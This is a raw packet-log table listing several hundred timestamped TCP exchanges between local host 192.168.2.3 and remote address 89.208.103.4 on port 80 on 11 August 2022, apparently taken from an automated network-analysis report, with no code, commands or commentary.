Aug 11, 2022 06:57:10.041482925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041518927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041555882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041594028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041632891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041636944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041656017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041661978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041671038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041686058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041708946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041721106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041744947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041781902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041795969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041819096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041831017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041857004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041896105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041906118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041932106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041969061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.041980028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042006016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042015076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042042017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042078972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042090893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042114973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042151928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042162895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042190075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042226076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042237997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042253017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.042270899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.042300940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.049959898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050023079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050074100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050101995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.050115108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050134897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.050163984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.050318956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050374031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050426006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050436020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.050463915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.050470114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.050694942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054260969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054384947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054429054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054469109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054470062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054503918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054532051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054778099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054826021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054862976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054883003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054898977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.054922104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.054946899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.055794954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.055835962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.055871964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.055918932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.055924892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.055951118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.055968046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.055979967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056252956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056318045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056416988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056454897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056490898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056509018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056529045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056579113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056581020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056622982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056627989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056659937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056705952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056708097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056751966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056787968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056798935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056826115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056873083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056876898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056919098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056922913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.056957960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.056993008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.057004929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.057032108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.057039976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.058705091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.062865019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.062894106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.062971115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.063013077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.063047886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.063106060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066194057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066224098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066251040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066278934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066303968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066330910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066345930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066350937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066368103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066385984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066389084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066414118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066418886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066442966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066445112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066464901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066473961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066495895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066508055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066541910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066554070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066570044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066590071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066596031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066617966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066626072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066638947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066658020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.066670895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.066704988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.068361044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.068383932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.068454981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069015980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069045067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069072008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069097042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069117069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069123983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069147110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069150925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069175959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069179058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069206953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069206953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069227934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069233894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069255114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069261074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069274902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069288015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069313049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069334984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069339991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069361925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069367886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069391012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069396019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069411039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069422007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069437981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069468975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069669008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069696903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069725037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069747925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069751024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069777966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069789886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069813967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069834948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.069840908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.069885969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070044994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070080996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070102930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070117950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070156097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070168972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070192099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070211887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070229053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070250988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070266962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070278883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070317030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070354939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070393085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.070405006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.070657015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.073162079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.073211908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.073323965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.074250937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074438095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074490070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074522972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.074544907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074558020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.074594975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.074600935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074646950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074659109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.074678898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.074731112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.075406075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.075453043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.075478077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.075500011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.075615883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.075656891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.075680017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.078150034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078193903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078236103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.078252077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.078315020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078373909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078430891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.078830004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078891993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078934908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078964949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.078974009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.078989983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.079031944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.079173088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.079224110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.079293013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.079340935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.079427958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.079516888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.079932928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.079993010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080045938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080079079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080087900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080105066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080127001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080152035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080163956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080173969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080485106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080523968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080549002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080574036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080648899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080687046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080724001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080750942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080760956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080765963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080797911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080837011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.080851078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.080885887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.081012964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.081049919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.081079960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.081105947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.081130981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.082741022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.082778931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.082817078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.082844973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.082866907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.082900047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083221912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083259106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083296061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083331108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083333015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083348989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083389044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083403111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083442926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083467960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083482027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083517075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083539963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083554983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083554983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083595991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083621025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083633900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083643913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083688021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083702087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083724976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083760023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083777905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083797932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083796024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083848953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083889008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083914042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.083925962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083964109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.083978891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084000111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084007978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084037066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084074020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084089994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084110975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084148884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084170103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084186077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084192038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084223986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084247112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084261894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084270954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084299088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084315062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.084328890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.084387064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.088068962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.088192940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.088229895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.088268042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.088273048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.088299990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.088305950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.088340998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.088342905 CEST	80	49736	89.208.103.4	192.168.2.3
